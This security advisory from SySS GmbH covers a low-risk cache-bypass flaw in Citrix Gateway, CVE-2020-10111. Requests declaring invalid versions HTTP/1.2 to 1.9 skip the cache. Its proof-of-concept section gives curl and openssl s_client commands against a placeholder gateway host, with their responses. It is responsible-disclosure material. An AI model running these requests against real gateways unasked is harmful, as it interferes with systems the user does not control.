Advisory ID: SYSS-2020-006 Product: Citrix Gateway Manufacturer: Citrix Systems, Inc. Affected Version(s): 11.1, 12.0, 12.1 Tested Version(s): 11.1.63.15, 12.0.63.13, 12.1.55.18 Vulnerability Type: Inconsistent Interpretation of HTTP Requests (CWE-444) Risk Level: Low Solution Status: Open Manufacturer Notification: 2020-01-31 Solution Date: no solution Public Disclosure: 2020-03-05 CVE Reference: CVE-2020-10111 Author of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: "Citrix Gateway is a customer-managed solution that can be deployed on premises or on any public cloud, such as AWS, Azure, or Google Cloud Platform. Citrix Gateway provides users with secure access and single sign-on to all the virtual, SaaS and web applications they need to be productive." (see [1]) The solution contains a caching system, which stores content for a static period of time. With a simple attack the cache can be bypassed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Requests with the invalid and not specified protocols declared as HTTP/1.2 up to HTTP/1.9 can be used to bypass the caching system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): As described in the security advisory SYSS-2020-005, the cache can be poisoned. The value in the cache was poisoned with the value 42. But this request should be answered with the value 23. $ curl --include --url https://$NSGATEWAYHOST/logon/incremental.php --data "value=22" HTTP/1.1 200 OK Age: 5 Date: Fri, 31 Jan 2020 12:26:03 GMT Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Connection: Keep-Alive Via: NS-CACHE-10.0: 121 ETag: "KXGGENKFDKOU" Server: Apache X-Frame-Options: SAMEORIGIN Pragma: no-cache Content-Length: 3 Content-Type: text/html; charset=UTF-8 42 Using HTTP/1.2 in the request, the cache can be bypassed and in the PoC request the value will be processed correctly. $ VALUE=22; echo -e "POST /logon/incremental.php HTTP/1.2\nHost: $NSGATEWAYHOST\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: $[${#VALUE}+6]\n\nvalue=$VALUE"|openssl s_client -connect $NSGATEWAYHOST:https -quiet depth=2 C = US, ST = New Jersey, L = Jersey City, O = The USERTRUST Network, CN = USERTrust RSA Certification Authority verify return:1 depth=1 C = GB, ST = Greater Manchester, L = Salford, O = Sectigo Limited, CN = Sectigo RSA Domain Validation Secure Server CA verify return:1 depth=0 CN = $NSGATEWAYHOST verify return:1 HTTP/1.1 200 OK Date: Fri, 31 Jan 2020 12:27:42 GMT Server: Apache X-Frame-Options: SAMEORIGIN Cache-Control: no-store, must-revalidate Pragma: no-cache Expires: 0 Content-Length: 3 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 23 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: SySS GmbH is not aware of a solution to the described security issue. The Citrix Security Response Team responded on 02/28/2020 with the following statement: "We have determined that the described cache behavior does not have a security impact and is not considered a vulnerability." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-01-30: Detection of the vulnerability 2020-01-31: Vulnerability reported to manufacturer 2020-02-28: Received vendor's response 2020-03-04: CVE number assigned 2020-03-05: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Citrix Gateway product website https://www.citrix.com/products/citrix-gateway/ [2] SySS Security Advisory SYSS-2020-006 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-006.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Micha Borrmann of SySS GmbH. E-Mail: micha.borrmann (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en